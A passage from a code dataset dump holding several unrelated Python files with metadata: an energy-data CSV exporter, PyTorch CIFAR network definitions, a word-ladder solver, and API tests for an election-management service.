billions of cubic feet of natural gas to kJ (1055055852620kJ per billion ft^3 of natural gas)\n naturalgas_data = naturalgas_0['series'][0]['data']\n for a in naturalgas_data:\n a[1] = a[1]*1055055852620\n \n # 
Return data\n return naturalgas_data\n\n# Store data in csv files \ndef storedata(data1, data2, data3, type1, type2, type3, csvtitle):\n \n # Make csv files\n csvfile = open(csvtitle, \"w\")\n \n # Create csvwriter\n csvwriter = csv.writer(csvfile, delimiter = \",\")\n \n # Put data into csv files\n csvwriter.writerow(['Year', 'Year/Month', type1 + ' (kJ)', type2 + ' (kJ)', type3 + ' (kJ)'])\n for a in data1:\n csvwriter.writerow([str(a[0][0:4]), str(a[0][0:4]) + \"-\" + str(a[0][4:6]), str(a[1]), str(data2[data1.index(a)][1]), str(data3[data1.index(a)][1])])\n\n# Call all functions\nstoredata(collectdata_renewable(), collectdata_nuclear(), collectdata_naturalgas(), 'Renewable Energy', 'Nuclear Energy', 'Natural Gas Energy', 'energydata.csv')", "sub_path": "csvdata.py", "file_name": "csvdata.py", "file_ext": "py", "file_size_in_byte": 3481, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 46, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 70, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "237153196", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef conv_block(in_channels, out_channels, kernel_size=3, stride=1,\n padding=1):\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding,\n bias=False),\n nn.BatchNorm2d(out_channels, affine=False),\n nn.ReLU(inplace=True)\n )\n\nclass ConvNet(nn.Module):\n def __init__(self):\n super(ConvNet, self).__init__()\n self.model = nn.Sequential(\n conv_block(3, 32),\n conv_block(32, 32),\n conv_block(32, 64, stride=2),\n conv_block(64, 64),\n conv_block(64, 64),\n conv_block(64, 128, stride=2),\n conv_block(128, 128),\n conv_block(128, 256),\n conv_block(256, 256),\n nn.AdaptiveAvgPool2d(1)\n )\n\n self.classifier = nn.Linear(256, 10, bias=False)\n\n def forward(self, x):\n h = self.model(x)\n B, C, _, _ = h.shape\n h = h.view(B, C)\n return self.classifier(h)\n\n\nclass CifarNet(nn.Module):\n '''\n From https://github.com/pytorch/tutorials/blob/master/beginner_source/blitz/cifar10_tutorial.py\n '''\n def __init__(self):\n super(CifarNet, self).__init__()\n self.conv1 = nn.Conv2d(3, 6, 5)\n self.pool = nn.MaxPool2d(2, 2)\n self.conv2 = nn.Conv2d(6, 16, 5)\n self.fc1 = nn.Linear(16 * 5 * 5, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n\n def forward(self, x):\n x = self.pool(F.relu(self.conv1(x)))\n x = self.pool(F.relu(self.conv2(x)))\n x = x.view(-1, 16 * 5 * 5)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n", "sub_path": "quant_fl/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1785, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.nn.Sequential", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": 
"name"}, {"api_name": "torch.nn.Module", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.AdaptiveAvgPool2d", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "437109279", "text": "#!/bin/python3\n\n\ndef word_ladder(start_word, end_word, dictionary_file='words5.dict'):\n '''\n Returns a list satisfying the following properties:\n 1. the first element is `start_word`\n 2. the last element is `end_word`\n 3. elements at index i and i+1 are `_adjacent`\n 4. 
all elements are entries in the `dictionary_file` file\n For example, running the command\n ```\n word_ladder('stone','money')\n ```\n may give the output\n ```\n ['stone', 'shone', 'phone', 'phony', 'peony', 'penny', 'benny', 'bonny', 'boney', 'money']\n ```\n but the possible outputs are not unique,\n so you may also get the output\n ```\n ['stone', 'shone', 'shote', 'shots', 'soots', 'hoots', 'hooty', 'hooey', 'honey', 'money']\n ```\n (We cannot use doctests here because the outputs are not unique.)\n Whenever it is impossible to generate a word ladder between the two words,\n the function returns `None`.\n '''\n\n from collections import deque\n from copy import deepcopy\n\n\n dic = open(dictionary_file)\n dictionary = dic.read().split(\"\\n\")\n\n stack = [] \n stack.append(start_word) \n queue = deque() \n queue.append(stack) \n\n if start_word == end_word: \n return stack \n\n while len(queue) > 0: \n topstack = queue.pop() \n newdic=deepcopy(dictionary)\n\n for word in newdic: \n if _adjacent(word,topstack[-1]) is True: \n copystack = deepcopy(topstack) \n copystack.append(word) \n\n if word == end_word: \n return copystack \n\n queue.appendleft(copystack) \n dictionary.remove(word) \n return None\n\n\n\n\ndef verify_word_ladder(ladder):\n '''\n Returns True if each entry of the input list is adjacent to its neighbors;\n otherwise returns False.\n '''\n\n if len(ladder) == 0:\n return False\n for i in range(len(ladder)-1):\n if not _adjacent(ladder[i],ladder[i+1]):\n return False\n return True\n\n\n\ndef _adjacent(word1, word2):\n '''\n Returns True if the input words differ by only a single character;\n returns False otherwise.\n >>> _adjacent('phone','phony')\n True\n >>> _adjacent('stone','money')\n False\n '''\n\n if len(word1) != len(word2):\n return False\n x=0\n for i in range(len(word1)):\n if word1[i] != word2[i]:\n x = x + 1\n if x==1:\n return True\n else:\n return False\n", "sub_path": "word_ladder.py", "file_name": "word_ladder.py", "file_ext": "py", "file_size_in_byte": 2789, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "collections.deque", "line_number": 38, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 46, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "493983579", "text": "import sys;\n\nfrom dateutil import parser;\nfrom data import getElectionDuration;\nfrom data import getIndividuals;\nfrom data import getIndividualsAdded;\nfrom data import getParliamentaryElection;\nfrom data import getPoliticalParties;\nfrom data import getPoliticalPartiesAdded;\nfrom data import getPresidentialElection;\nfrom data import setIndividualsAdded;\nfrom data import setParliamentaryElectionAdded;\nfrom data import setPoliticalPartiesAdded;\nfrom data import setPresidentialElectionAdded;\nfrom data import updateParliamentaryElectionTimes;\nfrom data import updatePresidetialElectionTimes;\nfrom utilities import addParticipants;\nfrom utilities import setParticipantIds;\nfrom utilities import adminLogin;\nfrom utilities import areEqual;\nfrom utilities import copyDictionary;\nfrom utilities import equals;\nfrom utilities import setUpAddElectionData;\nfrom utilities import setUpAdminHeaders;\nfrom utilities import setUpUserHeaders;\nfrom utilities import setUpAuthorizationErrorRequest;\nfrom utilities import runTests;\n\n\ndef setUpIndividualElectionErrorTest ( withAuthentication, authenticationAddress, administratorAddress, 
individualIds, politicalPartyIds ):\n def setUpIndividualElectionErrorTestImplementation ( url, headers, data, files ):\n if (not getIndividualsAdded ( )):\n if (individualIds is None):\n addParticipants ( withAuthentication, authenticationAddress, administratorAddress, getIndividuals, setIndividualsAdded );\n else:\n setParticipantIds ( getIndividuals, setIndividualsAdded, individualIds );\n\n if (not getPoliticalPartiesAdded ( )):\n if (politicalPartyIds is None):\n addParticipants ( withAuthentication, authenticationAddress, administratorAddress, getPoliticalParties, setPoliticalPartiesAdded );\n else:\n setParticipantIds ( getPoliticalParties, setPoliticalPartiesAdded, politicalPartyIds );\n\n if (withAuthentication):\n adminLogin ( authenticationAddress, headers );\n\n ids = [individual[\"id\"] for individual in getIndividuals ( )] + [getPoliticalParties ( )[0][\"id\"]];\n\n data[\"participants\"].extend ( ids );\n\n return (url, \"\", False);\n\n return setUpIndividualElectionErrorTestImplementation;\n\ndef setUpParliamentaryELectionErrorTest ( withAuthentication, authenticationAddress, administratorAddress, individualIds, politicalPartyIds ):\n def setUpParliamentaryElectionErrorTestImplementation ( url, headers, data, files ):\n if (not getIndividualsAdded ( )):\n if (individualIds is None):\n addParticipants ( withAuthentication, authenticationAddress, administratorAddress, getIndividuals, setIndividualsAdded );\n else:\n setParticipantIds ( getIndividuals, setIndividualsAdded, individualIds );\n\n if (not getPoliticalPartiesAdded ( )):\n if (individualIds is None):\n addParticipants ( withAuthentication, authenticationAddress, administratorAddress, getPoliticalParties, setPoliticalPartiesAdded );\n else:\n setParticipantIds ( getPoliticalParties, getPoliticalPartiesAdded, politicalPartyIds );\n\n if (withAuthentication):\n adminLogin ( authenticationAddress, headers );\n\n ids = [party[\"id\"] for party in getPoliticalParties ( )] + [getIndividuals ( )[0][\"id\"]];\n\n data[\"participants\"].extend ( ids );\n\n return (url, \"\", False);\n\n return setUpParliamentaryElectionErrorTestImplementation;\n\ndef setUpPresidentialElectionTest ( withAuthentication, authenticationAddress, administratorAddress, individualIds ):\n def setUpPresidentialElectionTestImplementation ( url, headers, data, files ):\n if (withAuthentication):\n adminLogin ( authenticationAddress, headers );\n\n if (not getIndividualsAdded ( )):\n if (individualIds is None):\n addParticipants ( withAuthentication, authenticationAddress, administratorAddress, getIndividuals, setIndividualsAdded );\n else:\n setParticipantIds ( getIndividuals, setIndividualsAdded, individualIds );\n\n pollNumbers = setUpAddElectionData ( data, updatePresidetialElectionTimes, getPresidentialElection, getIndividuals );\n\n return (url, pollNumbers, False);\n\n return setUpPresidentialElectionTestImplementation;\n\n\ndef setUpParliamentaryElectionTest ( withAuthentication, authenticationAddress, administratorAddress, politicalPartyIds ):\n def setUpParliamentaryElectionTestImplementation ( url, headers, data, files ):\n if (withAuthentication):\n adminLogin ( authenticationAddress, headers );\n\n if (not getPoliticalPartiesAdded ( )):\n if (politicalPartyIds is None):\n addParticipants ( withAuthentication, authenticationAddress, administratorAddress, getPoliticalParties, setPoliticalPartiesAdded );\n else:\n setParticipantIds ( getPoliticalParties, setPoliticalPartiesAdded, politicalPartyIds );\n\n pollNumbers = setUpAddElectionData ( 
data, updateParliamentaryElectionTimes, getParliamentaryElection, getPoliticalParties );\n\n return (url, pollNumbers, False);\n\n return setUpParliamentaryElectionTestImplementation;\n\n\ndef createElectionRequestTest ( setElectionAddedFuntion ):\n def createElectionRequestTestImplementation ( pollNumbers, expectedResponse, receivedResponse ):\n assert \"pollNumbers\" in receivedResponse, \"Invalid response, field pollNumbers is missing.\"\n\n receivedPollNumbers = receivedResponse[\"pollNumbers\"];\n\n assert areEqual ( pollNumbers, receivedPollNumbers ), f\"Invalid response, expected {pollNumbers}, received {receivedPollNumbers}\";\n\n setElectionAddedFuntion ( True );\n\n return createElectionRequestTestImplementation;\n\ndef setUpGetElectionRequest ( withAuthentication, authenticationAddress, presidentialElectionStart, presidentialElectionEnd, parliamentaryElectionStart, parliamentaryElectionEnd ):\n def setUpGetElectionRequestTestImplementation ( url, headers, data, files ):\n if (withAuthentication):\n adminLogin ( authenticationAddress, headers );\n\n if ( presidentialElectionStart and presidentialElectionEnd and parliamentaryElectionStart and parliamentaryElectionEnd ):\n getPresidentialElection ( )[\"start\"] = presidentialElectionStart;\n getPresidentialElection ( )[\"end\"] = presidentialElectionEnd;\n getParliamentaryElection ( )[\"start\"] = parliamentaryElectionStart;\n getParliamentaryElection ( )[\"end\"] = parliamentaryElectionEnd;\n\n return (url, \"\", False);\n\n return setUpGetElectionRequestTestImplementation;\n\ndef getElectionsRequestTest ( setUpData, expectedResponse, receivedResponse ):\n assert \"elections\" in receivedResponse, \"Invalid response, field elections is missing.\";\n\n receivedElections = receivedResponse[\"elections\"];\n\n assert len ( receivedElections ) == 2, \"Invalid response, invalid number of elections.\";\n\n checked = [ ];\n\n for receivedElection in receivedElections:\n assert \"id\" in receivedElection, \"Invalid response, field id is missing.\";\n assert \"start\" in receivedElection, \"Invalid response, field start is missing.\";\n assert \"end\" in receivedElection, \"Invalid response, field end is missing.\";\n assert \"individual\" in receivedElection, \"Invalid response, field individual is missing.\";\n assert \"participants\" in receivedElection, \"Invalid response, field participants is missing.\";\n\n receivedStart = parser.isoparse ( receivedElection[\"start\"] );\n receivedEnd = parser.isoparse ( receivedElection[\"end\"] );\n receivedIndividual = receivedElection[\"individual\"];\n receivedParticipants = receivedElection[\"participants\"];\n\n election = getPresidentialElection ( ) if ( receivedIndividual == True ) else getParliamentaryElection ( );\n\n assert not (receivedElection[\"id\"] in checked), \"Invalid response, duplicate id.\"\n\n expectedStart = parser.isoparse ( election[\"start\"] );\n expectedEnd = parser.isoparse ( election[\"end\"] );\n expectedIndividual = election[\"individual\"];\n expectedParticipants = election[\"participants\"];\n\n assert expectedStart == receivedStart , f\"Invalid field start for election {receivedElection}, expected {expectedStart}, received {receivedStart}.\";\n assert expectedEnd == receivedEnd , f\"Invalid field end for election {receivedElection}, expected {expectedEnd}, received {receivedEnd}.\";\n assert expectedIndividual == receivedIndividual , f\"Invalid field individual for election {receivedElection}, expected {expectedIndividual}, received {receivedIndividual}.\";\n 
assert areEqual ( receivedParticipants, expectedParticipants ), f\"Invalid field participants for election {receivedElection}, expected {expectedParticipants}, received {receivedParticipants}.\";\n\n election[\"id\"] = receivedElection[\"id\"];\n\n checked.append ( election[\"id\"] );\n\ndef setUpOverallapingElectionsErrorTest ( withAuthentication, authenticationAddress, getElectionFunction, operation ):\n def setUpOverallapingElectionsErrorTestImplementation ( url, headers, data, files ):\n if (withAuthentication):\n adminLogin ( authenticationAddress, headers );\n\n election = getElectionFunction ( );\n\n copyDictionary ( data, election );\n\n start = parser.isoparse ( data[\"start\"] );\n end = parser.isoparse ( data[\"end\"] );\n duration = getElectionDuration ( );\n step = duration / 2;\n start = operation ( start, step );\n end = operation ( end, step );\n data[\"start\"] = start.isoformat ( );\n data[\"end\"] = end.isoformat ( );\n\n\n return (url, \"\", False);\n\n return setUpOverallapingElectionsErrorTestImplementation;\n\n\ndef runElectionTests ( administratorAddress, withAuthentication, authenticationAddress, individualIds, politicalPartyIds, presidentialElectionStart, presidentialElectionEnd, parliamentaryElectionStart, parliamentaryElectionEnd ):\n tests = [\n # create election authorization error\n [\"post\", \"/createElection\", setUpAuthorizationErrorRequest ( withAuthentication ) , { }, { }, { } , 401, { \"msg\": \"Missing Authorization Header\" }, equals, 1],\n [\"post\", \"/createElection\", setUpUserHeaders ( withAuthentication, authenticationAddress ) , { }, { }, { } , 401, { \"msg\": \"Missing Authorization Header\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { }, { } , 400, { \"message\": \"Field start is missing.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"\" }, { } , 400, { \"message\": \"Field start is missing.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \" \" }, { } , 400, { \"message\": \"Field end is missing.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \" \" , \"end\": \"\" }, { } , 400, { \"message\": \"Field end is missing.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \" \" , \"end\": \" \" }, { } , 400, { \"message\": \"Field individual is missing.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \" \" , \"end\": \" \" , \"individual\": False }, { } , 400, { \"message\": \"Field participants is missing.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \" \" , \"end\": \" \" , \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid date and time.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"202106-16T15:55:46+0100\" , \"end\": \" \" , \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid date and time.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, 
authenticationAddress ) , { }, { \"start\": \"2021-06-16T1555460100\" , \"end\": \" \" , \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid date and time.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"2021-06-16T15:55:46+0100\", \"end\": \" \" , \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid date and time.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"2021-06-16T15:55:46+0100\", \"end\": \"202106-16T16:55:46+0100\" , \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid date and time.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"2021-06-16T15:55:46+0100\", \"end\": \"2021-06-16T1655460100\" , \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid date and time.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"2021-06-16T16:55:46+0100\", \"end\": \"2021-06-16T15:55:46+0100\", \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid date and time.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"2021-06-16T15:55:46+0100\", \"end\": \"2021-06-16T16:55:46+0100\", \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid participants.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"2021-06-16T15:55:46+0100\", \"end\": \"2021-06-16T16:55:46+0100\", \"individual\": False, \"participants\": [1] }, { } , 400, { \"message\": \"Invalid participants.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpIndividualElectionErrorTest ( withAuthentication, authenticationAddress, administratorAddress, individualIds, politicalPartyIds ) , { }, { \"start\": \"2021-06-16T15:55:46+0100\", \"end\": \"2021-06-16T16:55:46+0100\", \"individual\": True , \"participants\": [] }, { } , 400, { \"message\": \"Invalid participants.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpParliamentaryELectionErrorTest ( withAuthentication, authenticationAddress, administratorAddress, individualIds, politicalPartyIds ), { }, { \"start\": \"2021-06-16T15:55:46+0100\", \"end\": \"2021-06-16T16:55:46+0100\", \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid participants.\" }, equals, 1],\n\n # get elections error\n [\"get\", \"/getElections\", setUpAuthorizationErrorRequest ( withAuthentication ) , { }, { }, { }, 401, { \"msg\": \"Missing Authorization Header\" }, equals, 1],\n [\"get\", \"/getElections\", setUpUserHeaders ( withAuthentication, authenticationAddress ), { }, { }, { }, 401, { \"msg\": \"Missing Authorization Header\" }, equals, 1],\n\n # create election\n [\"post\", \"/createElection\", setUpPresidentialElectionTest ( withAuthentication, authenticationAddress, administratorAddress, individualIds ) , { }, { }, { }, 200, { }, createElectionRequestTest ( setPresidentialElectionAdded ) , 5],\n [\"post\", \"/createElection\", setUpParliamentaryElectionTest ( withAuthentication, authenticationAddress, administratorAddress, politicalPartyIds ), { }, { }, { }, 200, { }, 
createElectionRequestTest ( setParliamentaryElectionAdded ), 5],\n\n # get elections\n [\"get\", \"/getElections\", setUpGetElectionRequest ( withAuthentication, authenticationAddress, presidentialElectionStart, presidentialElectionEnd, parliamentaryElectionStart, parliamentaryElectionEnd ), { }, { }, { }, 200, { }, getElectionsRequestTest, 4],\n\n # create election invalid dates\n [\"post\", \"/createElection\", setUpOverallapingElectionsErrorTest ( withAuthentication, authenticationAddress, getPresidentialElection, lambda time, step: time - step ) , { }, { }, { }, 400, { \"message\": \"Invalid date and time.\" }, equals, 2],\n [\"post\", \"/createElection\", setUpOverallapingElectionsErrorTest ( withAuthentication, authenticationAddress, getParliamentaryElection, lambda time, step: time + step ), { }, { }, { }, 400, { \"message\": \"Invalid date and time.\" }, equals, 2],\n ]\n\n for test in tests:\n test[1] = administratorAddress + test[1];\n\n percentage = runTests ( tests );\n\n return percentage;\n", "sub_path": "tests/electionTests.py", "file_name": "electionTests.py", "file_ext": "py", "file_size_in_byte": 19454, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "data.getIndividualsAdded", "line_number": 32, "usage_type": "call"}, {"api_name": "utilities.addParticipants", "line_number": 34, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 34, "usage_type": "argument"}, {"api_name": "data.setIndividualsAdded", "line_number": 34, "usage_type": "argument"}, {"api_name": "utilities.setParticipantIds", "line_number": 36, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 36, "usage_type": "argument"}, {"api_name": "data.setIndividualsAdded", "line_number": 36, "usage_type": "argument"}, {"api_name": "data.getPoliticalPartiesAdded", "line_number": 38, "usage_type": "call"}, {"api_name": "utilities.addParticipants", "line_number": 40, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 40, "usage_type": "argument"}, {"api_name": "data.setPoliticalPartiesAdded", "line_number": 40, "usage_type": "argument"}, {"api_name": "utilities.setParticipantIds", "line_number": 42, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 42, "usage_type": "argument"}, {"api_name": "data.setPoliticalPartiesAdded", "line_number": 42, "usage_type": "argument"}, {"api_name": "utilities.adminLogin", "line_number": 45, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 47, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 47, "usage_type": "call"}, {"api_name": "data.getIndividualsAdded", "line_number": 57, "usage_type": "call"}, {"api_name": "utilities.addParticipants", "line_number": 59, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 59, "usage_type": "argument"}, {"api_name": "data.setIndividualsAdded", "line_number": 59, "usage_type": "argument"}, {"api_name": "utilities.setParticipantIds", "line_number": 61, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 61, "usage_type": "argument"}, {"api_name": "data.setIndividualsAdded", "line_number": 61, "usage_type": "argument"}, {"api_name": "data.getPoliticalPartiesAdded", "line_number": 63, "usage_type": "call"}, {"api_name": "utilities.addParticipants", "line_number": 65, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 65, "usage_type": "argument"}, 
{"api_name": "data.setPoliticalPartiesAdded", "line_number": 65, "usage_type": "argument"}, {"api_name": "utilities.setParticipantIds", "line_number": 67, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 67, "usage_type": "argument"}, {"api_name": "data.getPoliticalPartiesAdded", "line_number": 67, "usage_type": "argument"}, {"api_name": "utilities.adminLogin", "line_number": 70, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 72, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 72, "usage_type": "call"}, {"api_name": "utilities.adminLogin", "line_number": 83, "usage_type": "call"}, {"api_name": "data.getIndividualsAdded", "line_number": 85, "usage_type": "call"}, {"api_name": "utilities.addParticipants", "line_number": 87, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 87, "usage_type": "argument"}, {"api_name": "data.setIndividualsAdded", "line_number": 87, "usage_type": "argument"}, {"api_name": "utilities.setParticipantIds", "line_number": 89, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 89, "usage_type": "argument"}, {"api_name": "data.setIndividualsAdded", "line_number": 89, "usage_type": "argument"}, {"api_name": "utilities.setUpAddElectionData", "line_number": 91, "usage_type": "call"}, {"api_name": "data.updatePresidetialElectionTimes", "line_number": 91, "usage_type": "argument"}, {"api_name": "data.getPresidentialElection", "line_number": 91, "usage_type": "argument"}, {"api_name": "data.getIndividuals", "line_number": 91, "usage_type": "argument"}, {"api_name": "utilities.adminLogin", "line_number": 101, "usage_type": "call"}, {"api_name": "data.getPoliticalPartiesAdded", "line_number": 103, "usage_type": "call"}, {"api_name": "utilities.addParticipants", "line_number": 105, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 105, "usage_type": "argument"}, {"api_name": "data.setPoliticalPartiesAdded", "line_number": 105, "usage_type": "argument"}, {"api_name": "utilities.setParticipantIds", "line_number": 107, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 107, "usage_type": "argument"}, {"api_name": "data.setPoliticalPartiesAdded", "line_number": 107, "usage_type": "argument"}, {"api_name": "utilities.setUpAddElectionData", "line_number": 109, "usage_type": "call"}, {"api_name": "data.updateParliamentaryElectionTimes", "line_number": 109, "usage_type": "argument"}, {"api_name": "data.getParliamentaryElection", "line_number": 109, "usage_type": "argument"}, {"api_name": "data.getPoliticalParties", "line_number": 109, "usage_type": "argument"}, {"api_name": "utilities.areEqual", "line_number": 122, "usage_type": "call"}, {"api_name": "utilities.adminLogin", "line_number": 131, "usage_type": "call"}, {"api_name": "data.getPresidentialElection", "line_number": 134, "usage_type": "call"}, {"api_name": "data.getPresidentialElection", "line_number": 135, "usage_type": "call"}, {"api_name": "data.getParliamentaryElection", "line_number": 136, "usage_type": "call"}, {"api_name": "data.getParliamentaryElection", "line_number": 137, "usage_type": "call"}, {"api_name": "dateutil.parser.isoparse", "line_number": 159, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 159, "usage_type": "name"}, {"api_name": "dateutil.parser.isoparse", "line_number": 160, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 160, "usage_type": "name"}, {"api_name": 
"data.getPresidentialElection", "line_number": 164, "usage_type": "call"}, {"api_name": "data.getParliamentaryElection", "line_number": 164, "usage_type": "call"}, {"api_name": "dateutil.parser.isoparse", "line_number": 168, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 168, "usage_type": "name"}, {"api_name": "dateutil.parser.isoparse", "line_number": 169, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 169, "usage_type": "name"}, {"api_name": "utilities.areEqual", "line_number": 176, "usage_type": "call"}, {"api_name": "utilities.adminLogin", "line_number": 185, "usage_type": "call"}, {"api_name": "utilities.copyDictionary", "line_number": 189, "usage_type": "call"}, {"api_name": "dateutil.parser.isoparse", "line_number": 191, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 191, "usage_type": "name"}, {"api_name": "dateutil.parser.isoparse", "line_number": 192, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 192, "usage_type": "name"}, {"api_name": "data.getElectionDuration", "line_number": 193, "usage_type": "call"}, {"api_name": "utilities.setUpAuthorizationErrorRequest", "line_number": 209, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 209, "usage_type": "name"}, {"api_name": "utilities.setUpUserHeaders", "line_number": 210, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 210, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 211, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 211, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 212, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 212, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 213, 